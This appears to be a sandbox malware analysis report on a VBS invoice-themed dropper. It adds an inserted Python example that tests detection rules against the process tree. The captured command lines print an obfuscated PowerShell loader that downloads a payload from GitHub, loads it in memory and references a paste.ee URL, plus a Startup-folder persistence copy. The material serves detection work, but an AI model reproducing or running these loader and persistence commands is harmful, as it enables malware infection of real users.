'+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); 
[dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0M
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -comma
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", ProcessId: 4648, ProcessName: wscript.exe
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -comma
Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", ProcessId: 4648, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6264, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), ProcessId: 5944, ProcessName: powershell.exe
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, 
{'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
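Every Sigma hit above keys on the command line or on the parent/child pair. As an added example (not from the report and not the Sigma project's rule logic), the Python below rebuilds the process tree from the PIDs on this page and runs simplified stand-ins for those rules over it. The events are constructed from the process tree and the Sigma match data (wscript.exe's parent PID 4084 comes from there); the stage-1 base64 literal is elided on the page, so a placeholder 'QUJD' stands in, and the middle of the stage-2 launcher is shortened to "..."; rule names and regexes are this example's own. What it shows is that a token rule such as FromBase64String catches stage 1 but misses stage 2, where that token is split into 'Fr'+'omBas'+'e64St'+..., while rules on the -f [char] format, on the $VerbosePreference index trick and on the wscript.exe > powershell.exe ancestry still fire.

```python
"""Process-tree rules over process creation events constructed from the report."""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed from the report's process tree and Sigma match data. The stage-1
# base64 literal is elided on the page ('QUJD' is a placeholder) and the middle
# of the stage-2 launcher is abbreviated to "...".
EVENTS = [
    Event(4648, 4084, r"C:\Windows\System32\wscript.exe",
          r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs"'),
    Event(6264, 4648, r"C:\Windows\System32\cmd.exe",
          r""""C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')"""),
    Event(5880, 6264, r"C:\Windows\System32\conhost.exe",
          r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    Event(3688, 6264, r"C:\Windows\System32\PING.EXE", r"ping 127.0.0.1 -n 10"),
    Event(5944, 6264, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"""powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')"""),
    Event(4832, 4648, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'QUJD';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"""),
    Event(7008, 4832, r"C:\Windows\System32\conhost.exe",
          r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    Event(4844, 4832, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+ ... +'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')" """.rstrip()),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_FILE = re.compile(r'\.(?:vbs|vbe|js|jse|wsf)"?\s*$', re.I)

# Simplified stand-ins for the command-line patterns the Sigma hits key on;
# the names and regexes are this example's own, not the Sigma rules' logic.
RULES = [
    ("execution_policy_bypass", re.compile(r"-(?:executionpolicy|ep)\s+bypass", re.I)),
    ("base64_decode_in_cmdline", re.compile(r"FromBase64String", re.I)),
    ("ping_loopback_sleep", re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+\d+", re.I)),
    ("startup_folder_copy", re.compile(r"File\]::Copy\(.*Start Menu\\Programs\\Startup", re.I)),
    ("char_format_obfuscation", re.compile(r"-f\s*\[char\]\d+", re.I)),
    ("verbosepreference_iex_alias", re.compile(r"\$verbosepreference\)\[\d", re.I)),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image chain from the outermost known ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def evaluate(events):
    """Map each pid that fires at least one rule to its sorted rule names."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        fired = [name for name, rx in RULES if rx.search(e.cmdline)]
        image = basename(e.image)
        parent = by_pid.get(e.ppid)
        # Script host started with a script file argument (WScript/CScript dropper pattern).
        if image in SCRIPT_HOSTS and SCRIPT_FILE.search(e.cmdline):
            fired.append("script_host_runs_script_file")
        # Shell or PowerShell whose direct parent is a script host.
        if parent is not None and basename(parent.image) in SCRIPT_HOSTS and image in SHELLS:
            fired.append("script_host_spawns_shell")
        if fired:
            hits[e.pid] = sorted(fired)
    return hits


if __name__ == "__main__":
    for pid, names in sorted(evaluate(EVENTS).items()):
        print(pid, " > ".join(ancestry(EVENTS, pid)), names)
```

PID 4832 fires the base64 rule and the script-host ancestry rule; PID 4844, spawned from another powershell.exe with every sensitive token split, is caught only by the format-string and $VerbosePreference patterns plus the shared -executionpolicy bypass switch, which is why a detection set should pair literal-token rules with structural ones and with the ancestry shown by ancestry().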
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-04T11:25:23.864259+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49709 | 188.114.96.3 | 443 | TCP


AV Detection

Source: FAKTURA-pdf-466366332.vbs, Virustotal: Detection: 9%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.6% probability
Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb; source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1732143246.000001B9E0134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1730333035.000001B9DFE4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbes(x source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
